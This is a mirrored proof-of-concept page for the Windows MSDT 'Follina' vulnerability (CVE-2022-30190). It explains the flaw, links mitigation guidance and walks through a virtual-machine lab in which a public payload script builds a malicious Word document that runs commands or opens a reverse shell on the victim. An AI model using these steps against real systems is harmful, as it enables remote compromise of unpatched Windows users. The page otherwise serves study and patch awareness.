POC详情: c3c2212b66eea46a0a672ee41ec84f146be6375a

来源
关联漏洞
标题: Microsoft Windows Support Diagnostic Tool 操作系统命令注入漏洞 (CVE-2022-30190)
描述:Microsoft Windows Support Diagnostic Tool是美国微软(Microsoft)公司的收集信息以发送给 Microsoft 支持的工具。 Microsoft Windows Support Diagnostic Tool (MSDT)存在操作系统命令注入漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows
描述
CVE-2022-30190 Proof-Of-Concept
介绍
## CVE?
CVE stands for Common Vulnerabilities and Exposures. In simple terms, it means the assigning of numbers to vulnerabilities or security issues that are found within a computer system or software. The main purpose of CVE is to provide a consistent reference for organizations and users to effectively track and manage their vulnerabilities.

## CVE-2022-30190 _a.k.a_ "Follina"
The security vulnerability named **CVE-2022-30190**, otherwise known as **"Follina"** shocked the cybersecurity community in 2022 because of its potential to spread. This is a vulnerability in Microsoft Office products, particularly in Word, that enables attackers to remotely execute code by just tricking users into opening a specially crafted document. It is, however, very dangerous since it does not depend on the enablement of macros, and that makes blocking of such an attack harder with traditional security measures.

Some sources about the discovery of CVE-2022-30190 :
- [cve.org](https://www.cve.org/CVERecord?id=CVE-2022-30190)
- [nvd.gov](https://nvd.nist.gov/vuln/detail/cve-2022-30190)
- [Medium](https://medium.com/@ajithcrajendran/follina-msdt-cve-2022-30190-aab6575c8224)
- [Wikipedia](https://id.wikipedia.org/wiki/CVE-2022-30190)
- [HackTheBox](https://www.hackthebox.com/blog/cve-2022-30190-follina-explained)

## Mitigation for CVE-2022-30190
Just do a system update by turning on the system update periodically on your Microsoft Windows operating system.

Some resources on how to mitigate CVE-2022-30190 :
- [Microsoft Official Guidance](https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/)
- [SentinelOne](https://www.sentinelone.com/blog/staying-ahead-of-cve-2022-30190-follina/)

## Test Run on Virtual Machine
#### Tools and operating system used :
- Debian 12 as the attacker (host computer)
- Windows 10 build 19044.1288 (running on vm) as the victim
- Virtual Box
#### Things that should be considered :
- The attacks in this experiment were only performed on the same local network
- The attack can be carried out through the outside network, but requires some tinkering
- The attack in this test was carried out with the antivirus disabled on the victim's computer
- The attack can only be carried out on Microsoft Windows operating systems that are old builds or that have not received new security patches since May 30, 2022 including Windows 10 and 11
#### Usage :
Do an update on the attacker's computer (host) which here uses the Debian 12 operating system by using this command
```
$ sudo apt update && sudo apt upgrade -y
```
Install GIT if not already
```
$ sudo apt install git
```
Install Python if not already
```
$ sudo apt install python3
```
Install "netifaces" module for Python3
```
$ sudo apt install python3-netifaces
```
Clone the payload repository created by [John Hammond](https://github.com/JohnHammond/) and move to its directory
```
$ git clone https://github.com/JohnHammond/msdt-follina.git
$ cd msdt-follina
```
Run the payload and move the _**follina.doc**_ file located in the msdt-follina directory to the victim's computer
```
$ python3 follina.py
```
Open the _**follina.doc**_ file on the victim's computer
If the payload is successful, the calculator application will open

To execute other programs you can use the command (here I'm using an example to open the notepad application)
```
$ python3 follina.py -c "notepad.exe"
```

![Screenshot](https://github.com/madbaiu/CVE-2022-30190/blob/main/pic/Screenshot%20from%202024-11-25%2021-36-11.png?raw=true)

To do a reverse shell payload you can simply using this following command 
```
$ python3 follina.py -r 9999
```
If the reverse shell payload is successful, you will directly enter the victim's computer directory and you can do whatever you want on the victim's computer

![Screenshot](https://github.com/madbaiu/CVE-2022-30190/blob/main/pic/Screenshot%20from%202024-11-25%2021-54-07.png?raw=true)

![Screenshot](https://github.com/madbaiu/CVE-2022-30190/blob/main/pic/Screenshot%20from%202024-11-25%2021-44-53.png?raw=true)

## Conclusions
As of July 22, 2022, this vulnerability has been patched by Microsoft, but it does not rule out the possibility that this vulnerability can still have an impact on those who do not regularly update their Windows operating system. Therefore do not forget to always update your operating system to keep cybercriminals from doing their actions, Cheers!

文件快照

[4.0K] /data/pocs/c3c2212b66eea46a0a672ee41ec84f146be6375a ├── [4.0K] msdt-follina │   ├── [4.0K] doc │   │   ├── [1.3K] [Content_Types].xml │   │   ├── [4.0K] docProps │   │   │   ├── [ 704] app.xml │   │   │   └── [ 735] core.xml │   │   └── [4.0K] word │   │   ├── [3.8K] document.xml │   │   ├── [1.5K] fontTable.xml │   │   ├── [4.0K] _rels │   │   │   └── [ 975] document.xml.rels │   │   ├── [2.9K] settings.xml │   │   ├── [ 29K] styles.xml │   │   ├── [4.0K] theme │   │   │   └── [6.6K] theme1.xml │   │   └── [ 803] webSettings.xml │   ├── [ 10K] follina.doc │   ├── [5.0K] follina.py │   ├── [ 44K] nc64.exe │   └── [1.5K] README.md ├── [4.0K] pic │   ├── [ 46K] Screenshot from 2024-11-25 21-36-11.png │   ├── [ 44K] Screenshot from 2024-11-25 21-44-53.png │   └── [ 97K] Screenshot from 2024-11-25 21-54-07.png └── [4.4K] README.md 7 directories, 18 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。